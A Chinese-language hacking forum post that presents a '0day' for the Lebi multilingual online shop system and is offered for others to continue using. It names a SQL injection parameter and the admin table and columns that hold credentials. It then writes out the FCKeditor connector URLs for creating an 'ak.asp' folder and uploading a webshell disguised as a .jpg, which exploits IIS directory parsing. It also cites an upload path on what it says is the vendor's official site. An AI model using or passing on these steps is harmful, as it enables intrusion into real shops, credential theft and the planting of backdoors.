乐彼多语言网上商城系统 0day
马上回家了,朋友结婚。 蚂蚁大牛欺负我,丢了个后台给我!是乐彼多语言网上商城系统!
粗略看了2眼。随便找个url试下注射。在按价格分类的地方存在注入。
/productp.asp?sprice=1000|1999
管理员表段为 Lebi_adminuser 字段为admin_name admin_pass
不细说了,得到管理员帐号密码!
登陆后台,添加商品。发现后台是用了fckeditor编辑器!
直接通过fckeditor拿去webshell !
经测试。发现通过fckeditor 可以直接得到webshell ! 官网存在此漏洞! 不过官网是用了IIS安全软件之类的东西 x.asp/xxx.jpg 不能执行。 由于着急就不去继续了。应该可以轻松绕过的。 时间仓促未能图文并茂。 留下几句话 直接创建ak.asp 文件夹 上传jpg 小马 的代码收工了
创建ak.asp文件夹
1. http://xxx.xxx.xxx/admin/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/ak.asp&NewFolderName=ak.asp |
上传jpg小马 打开url 选择ak.asp 文件目录然后上传 .jog小马
1. http://xxx.xxx.xxx/admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/admin/fckeditor/editor/filemanager/connectors/asp/connector.asp |
我们的小马访问地址是 xxx 是随机的 记住你刚才的xxx.jpg的文件名称即可
1. http://xxx.xxx.xxx/pic/UserFiles/Image/ak.asp/xxx.jpg |
官网的未执行小马
1. http://eshop.56770.com/lanshop/pic/userfiles/file/1.asp/20100104162153806974.jpg |
我走了 你们继续 !